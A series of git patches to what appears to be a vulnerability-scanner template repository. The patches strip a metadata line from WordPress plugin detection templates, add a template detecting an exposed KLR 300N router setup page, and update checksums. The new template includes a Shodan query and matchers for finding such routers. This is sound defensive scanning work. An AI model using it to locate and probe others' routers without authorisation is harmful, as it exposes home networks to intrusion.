tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-fastest-cache/ metadata: - max-request: 1 plugin_namespace: wp-fastest-cache wpscan: https://wpscan.com/plugin/wp-fastest-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml index f3c481b824..85900a01a7 100644 --- a/http/technologies/wordpress/plugins/wp-file-manager.yaml +++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-file-manager/ metadata: - max-request: 1 plugin_namespace: wp-file-manager wpscan: https://wpscan.com/plugin/wp-file-manager tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml index ba214fd7ea..a7ccde0b49 100644 --- a/http/technologies/wordpress/plugins/wp-google-maps.yaml +++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-google-maps/ metadata: - max-request: 1 plugin_namespace: wp-google-maps wpscan: https://wpscan.com/plugin/wp-google-maps tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml index 8f5fe8d9a5..422664a98c 100644 --- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml +++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-mail-smtp/ metadata: - max-request: 1 plugin_namespace: wp-mail-smtp wpscan: https://wpscan.com/plugin/wp-mail-smtp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml index 0458b13354..f0af3a748a 100644 --- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml +++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-maintenance-mode/ metadata: - max-request: 1 plugin_namespace: wp-maintenance-mode wpscan: https://wpscan.com/plugin/wp-maintenance-mode tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml index d570be07bf..f89f1a20b3 100644 --- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml +++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-migrate-db/ metadata: - max-request: 1 plugin_namespace: wp-migrate-db wpscan: https://wpscan.com/plugin/wp-migrate-db tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml index ee05e3add8..01fb12d0ad 100644 --- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml +++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-multibyte-patch/ metadata: - max-request: 1 plugin_namespace: wp-multibyte-patch wpscan: https://wpscan.com/plugin/wp-multibyte-patch tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index df2487955f..1773857e15 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-optimize/ metadata: - max-request: 1 plugin_namespace: wp-optimize wpscan: https://wpscan.com/plugin/wp-optimize tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index 79ff01211c..bcd1509c68 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-pagenavi/ metadata: - max-request: 1 plugin_namespace: wp-pagenavi wpscan: https://wpscan.com/plugin/wp-pagenavi tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 23414b3d1d..c6aca20a60 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reset/ metadata: - max-request: 1 plugin_namespace: wp-reset wpscan: https://wpscan.com/plugin/wp-reset tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index fba45020e4..56dfdf4a59 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-reviews-plugin-for-google/ metadata: - max-request: 1 plugin_namespace: wp-reviews-plugin-for-google wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index 0178c8e9fb..810fc82cde 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-rollback/ metadata: - max-request: 1 plugin_namespace: wp-rollback wpscan: https://wpscan.com/plugin/wp-rollback tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 017cf76f11..2276545093 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-seopress/ metadata: - max-request: 1 plugin_namespace: wp-seopress wpscan: https://wpscan.com/plugin/wp-seopress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a04ddc6003..783d381ed8 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-sitemap-page/ metadata: - max-request: 1 plugin_namespace: wp-sitemap-page wpscan: https://wpscan.com/plugin/wp-sitemap-page tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index bc83478f06..27f6d46c2b 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-smushit/ metadata: - max-request: 1 plugin_namespace: wp-smushit wpscan: https://wpscan.com/plugin/wp-smushit tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index dedd2e23b6..ab61cc0338 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-statistics/ metadata: - max-request: 1 plugin_namespace: wp-statistics wpscan: https://wpscan.com/plugin/wp-statistics tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 03cd7137a8..5f6fbc1f75 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-super-cache/ metadata: - max-request: 1 plugin_namespace: wp-super-cache wpscan: https://wpscan.com/plugin/wp-super-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml index a68d4b7d78..d67150d038 100644 --- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml +++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wp-user-avatar/ metadata: - max-request: 1 plugin_namespace: wp-user-avatar wpscan: https://wpscan.com/plugin/wp-user-avatar tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index bf9dfc3ad8..beeba7ca69 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-recaptcha/ metadata: - max-request: 1 plugin_namespace: wpcf7-recaptcha wpscan: https://wpscan.com/plugin/wpcf7-recaptcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index 47911a86a5..c225df7bfd 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpcf7-redirect/ metadata: - max-request: 1 plugin_namespace: wpcf7-redirect wpscan: https://wpscan.com/plugin/wpcf7-redirect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 1c25b6f488..aaad04cb76 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpforms-lite/ metadata: - max-request: 1 plugin_namespace: wpforms-lite wpscan: https://wpscan.com/plugin/wpforms-lite tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index b36317acd8..ff750a7d2a 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wps-hide-login/ metadata: - max-request: 1 plugin_namespace: wps-hide-login wpscan: https://wpscan.com/plugin/wps-hide-login tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 5eb35dd17e..f1e7595ccd 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wpvivid-backuprestore/ metadata: - max-request: 1 plugin_namespace: wpvivid-backuprestore wpscan: https://wpscan.com/plugin/wpvivid-backuprestore tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index ceb2b8d600..4b2769ee46 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/yith-woocommerce-wishlist/ metadata: - max-request: 1 plugin_namespace: yith-woocommerce-wishlist wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist tags: tech,wordpress,wp-plugin,top-100,top-200 From ea82d21d64b746afee549de7e56084310a31fcda Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 27 Sep 2023 10:04:00 +0530 Subject: [PATCH 17/23] Create klr300n-installer.yaml --- .../installer/klr300n-installer.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/misconfiguration/installer/klr300n-installer.yaml diff --git a/http/misconfiguration/installer/klr300n-installer.yaml b/http/misconfiguration/installer/klr300n-installer.yaml new file mode 100644 index 0000000000..b17ed06001 --- /dev/null +++ b/http/misconfiguration/installer/klr300n-installer.yaml @@ -0,0 +1,36 @@ +id: klr300n-install + +info: + name: KLR 300N Router - Exposed Installation + author: andreluna + severity: high + description: | + Home router wireless KLR 300N setup page were Detected. + reference: + - http://www.keo.com.br/produtos/roteador-klr-300n + - http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf + metadata: + max-request: 1 + verified: true + shodan-query: html:"def_wirelesspassword" + tags: keo,klr300n,misconfig,exposure,iot,install + +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Roteador Wireless KLR 300N" + - "def_wirelesspassword" + - "Installation assitance" + condition: and + + - type: status + status: + - 200 From a6cc1fc0ce613caf863a8361e29d61eb2a4fecb8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 04:46:18 +0000 Subject: [PATCH 18/23] Auto Generated New Template Addition List [Wed Sep 27 04:46:18 UTC 2023] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9442a7afae..c08a9ca12d 100644 --- a/.new-additions +++ b/.new-additions @@ -9,6 +9,7 @@ http/misconfiguration/installer/akeeba-installer.yaml http/misconfiguration/installer/alma-installer.yaml http/misconfiguration/installer/bitrix24-installer.yaml http/misconfiguration/installer/gibbon-installer.yaml +http/misconfiguration/installer/klr300n-installer.yaml http/misconfiguration/installer/mantisbt-installer.yaml http/misconfiguration/installer/ojs-installer.yaml http/misconfiguration/installer/zabbix-installer.yaml From 23bbf9152953a7c39f1e67509bc81dab176eb709 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Wed, 27 Sep 2023 04:46:32 +0000 Subject: [PATCH 19/23] Auto Generated Templates Checksum [Wed Sep 27 04:46:32 UTC 2023] :robot: --- templates-checksum.txt | 423 +++++++++++++++++++++-------------------- 1 file changed, 212 insertions(+), 211 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 89cd2afb29..0bbbd267de 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9 -cves.json:ea50d934bd6f4d67ccdf4cfba0dd3b997fa1e52c -cves.json-checksum.txt:263d1c5437bc59b8e969b3db7f11e87193a8ce6d +cves.json:0bab0d9ddda6759c34bb88d57e44c11030dd69e4 +cves.json-checksum.txt:9212314a5ad1b8744e91fe1534a405b326c4e645 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c @@ -362,7 +362,7 @@ helpers/wordlists/wp-passwords.txt:dd36d46539d71aa9d1ecbdc83c7b74b931986d56 helpers/wordlists/wp-users.txt:b07f7f79b1d6ed1832e37e1d3feea3fd2bfb764b helpers/wordpress/plugins/ad-inserter.txt:048ceafceae47b034560600476a295b608c60cf4 helpers/wordpress/plugins/add-to-any.txt:08d2e98e6754af941484848930ccbaddfefe13d6 -helpers/wordpress/plugins/admin-menu-editor.txt:4572917cbde34e4ba98ab9a65059efd81be6594b +helpers/wordpress/plugins/admin-menu-editor.txt:aa8d05244067e63778197cff65d9209d713328a4 helpers/wordpress/plugins/adminimize.txt:f6eef27f4f1b21ffb32d92f3a8eee2e89d01c7df helpers/wordpress/plugins/advanced-custom-fields.txt:cffca9b2145cbe8b44269c74219f807eace99c3e helpers/wordpress/plugins/akismet.txt:e710dd44fa12f98194f8bba2bb20cba7bee18ff6 @@ -372,7 +372,7 @@ helpers/wordpress/plugins/all-in-one-wp-migration.txt:addf63c8a9f97e52b5b7aca6dc helpers/wordpress/plugins/all-in-one-wp-security-and-firewall.txt:32caf6abda6a7a1a799e1775e6c5b3e7e32ad59f helpers/wordpress/plugins/amp.txt:cc005cc7de6351bdaa671675148c076564275a57 helpers/wordpress/plugins/antispam-bee.txt:bd5240b767bb950186835acb8bf1d4cb794a5706 -helpers/wordpress/plugins/astra-sites.txt:fbc954f986ea78ee55f14e1ee288f60983e46fb5 +helpers/wordpress/plugins/astra-sites.txt:23d49915eae53800c735cfc0f01c21a9d05e727a helpers/wordpress/plugins/astra-widgets.txt:386ef6797a9c4de50f240b16bd76bbeae35a5711 helpers/wordpress/plugins/autoptimize.txt:661ae89c9a4b16c450c2a094d410c4ee74719cb3 helpers/wordpress/plugins/backwpup.txt:063ee00ca80d81e068dd404b59ceb2a03b2e7109 @@ -485,13 +485,13 @@ helpers/wordpress/plugins/pdf-embedder.txt:fe43108f583e1215970ae2e88527d0fbd89b7 helpers/wordpress/plugins/photo-gallery.txt:118daf97168a9a15434efdbbaa6d2dbe5614eec6 helpers/wordpress/plugins/php-compatibility-checker.txt:c117423da3e5e169d36e3111880b709d28e85308 helpers/wordpress/plugins/pinterest-for-woocommerce.txt:4119e202faec947c57ff360c949b277fd6c29cd4 -helpers/wordpress/plugins/pixelyoursite.txt:f358a15cc523a1f31429fce832dc8c0c554fc41b +helpers/wordpress/plugins/pixelyoursite.txt:af04551215298737e83ffeff86e0a4a63e5f57af helpers/wordpress/plugins/polylang.txt:c7fc6bde7dbf4cb2d89ab4b2bd57e166ce750ec0 helpers/wordpress/plugins/popup-builder.txt:fc3e46507eb91f2ee9902bdf4b44b9e897b6eea7 helpers/wordpress/plugins/popup-maker.txt:2b3c6ac23cfffce2c714f7553284e912852ab2fe helpers/wordpress/plugins/post-smtp.txt:b6ed966424606782d1fc2f9032f0fb0e4d237bd7 helpers/wordpress/plugins/post-types-order.txt:31f566259c1a3f810256e3679e10faa457bb4a0b -helpers/wordpress/plugins/premium-addons-for-elementor.txt:befa0edb7ef642be5e7dfc7cc7c69bc31127207e +helpers/wordpress/plugins/premium-addons-for-elementor.txt:1782590faaba5ee6facdf2297f1590794447be5a helpers/wordpress/plugins/pretty-link.txt:eedf6a14348e4bc362e215e4dcd1e066e0bd16f7 helpers/wordpress/plugins/really-simple-captcha.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf helpers/wordpress/plugins/really-simple-ssl.txt:b638f84cceb02801b7ef7b94df984fd22b23f59e @@ -500,8 +500,8 @@ helpers/wordpress/plugins/redux-framework.txt:0f2d74125dea18acce67c02619dcfea86c helpers/wordpress/plugins/regenerate-thumbnails.txt:aba31d0ba474d83f50978833d17946c355cb20c4 helpers/wordpress/plugins/safe-svg.txt:595d550379b2cb8bccb9659627308ff4e751d23f helpers/wordpress/plugins/seo-by-rank-math.txt:ee6a6cf943f9c499c0224b71af2aaa48cb166774 -helpers/wordpress/plugins/sg-cachepress.txt:9c381dd6bbe0788e8717d7adc6b2f8b8d3687aaa -helpers/wordpress/plugins/sg-security.txt:6546e0bd1a292663f6166d3d6d903530b6db35c4 +helpers/wordpress/plugins/sg-cachepress.txt:04e136873d85cb62901bb699285d9280e05828df +helpers/wordpress/plugins/sg-security.txt:a2048abb201b6201e7cd25e8b0262758a98d59da helpers/wordpress/plugins/shortcodes-ultimate.txt:c53ed3ab1a6689cbfb71149816b427f4cf870dc3 helpers/wordpress/plugins/shortpixel-image-optimiser.txt:1d9a9eb3723d36c07bbcef114c168744dedfa05e helpers/wordpress/plugins/simple-custom-post-order.txt:106ca8d85638866255a70e746e9653cec398864b @@ -537,8 +537,8 @@ helpers/wordpress/plugins/woo-checkout-field-editor-pro.txt:381bb12da04a82580bb6 helpers/wordpress/plugins/woo-variation-swatches.txt:08d2e98e6754af941484848930ccbaddfefe13d6 helpers/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.txt:5b7155a36d36681935655d772bbc981bc2393fa3 helpers/wordpress/plugins/woocommerce-gateway-stripe.txt:7035802a8f118b141c54f97b9e8bf36b7d7f53a2 -helpers/wordpress/plugins/woocommerce-payments.txt:60e6b29cae222d0ccf5641a7ebe9d778961c2629 -helpers/wordpress/plugins/woocommerce-paypal-payments.txt:53847c48faeb5e255ebcdd1a4762a53f7163d7f0 +helpers/wordpress/plugins/woocommerce-payments.txt:5087f47c1da6ef46c35e08c9ec1a9e2db4fc24a4 +helpers/wordpress/plugins/woocommerce-paypal-payments.txt:01b1c534c2db2eebe8eb41bca1f0ffc4193b0e3f helpers/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.txt:634ac7a7e33e6dc123884fef23157c442970fb87 helpers/wordpress/plugins/woocommerce-services.txt:440a9edb1796d0cd5f2d71aea1a74af81b05abbd helpers/wordpress/plugins/woocommerce.txt:dfaff11acbd25d0758b7c5294b4ff9d37debac19 @@ -4507,6 +4507,7 @@ http/misconfiguration/installer/impresspages-installer.yaml:0d25cc61a9726b3527e2 http/misconfiguration/installer/indegy-sensor-installer.yaml:c4b65b906536d0e71d9128a43b1bbf31c7c6ad55 http/misconfiguration/installer/jira-setup.yaml:98368f306cef91d92ecd53725eca807b2cf1af2a http/misconfiguration/installer/joomla-installer.yaml:9f89a6d16c8fef98b9a4de986d22768b2aa76895 +http/misconfiguration/installer/klr300n-installer.yaml:24c4c70cfdf1cfbde3df5ce9bdad6c9822383e1a http/misconfiguration/installer/limesurvey-installer.yaml:54fa5e339c11fa21e16c99344948bfcd4c854335 http/misconfiguration/installer/lmszai-installer.yaml:bd5e1d6df6913b83a85555d8015ece59b19bf27a http/misconfiguration/installer/lychee-installer.yaml:54b1ca8400339d8ce3442109dea8356a809288a2 @@ -5860,218 +5861,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114 -http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd -http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539 -http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51 +http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed +http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1 +http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0 -http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724 -http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7 -http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba -http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27 -http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96 -http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e -http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4 -http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f -http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07 -http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1 -http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c -http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff -http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a -http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e -http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309 -http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c -http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d -http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a -http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae -http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299 -http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7 -http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9 +http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0 +http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5 +http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e +http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65 +http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61 +http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc +http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2 +http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12 +http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b +http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226 +http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77 +http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46 +http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61 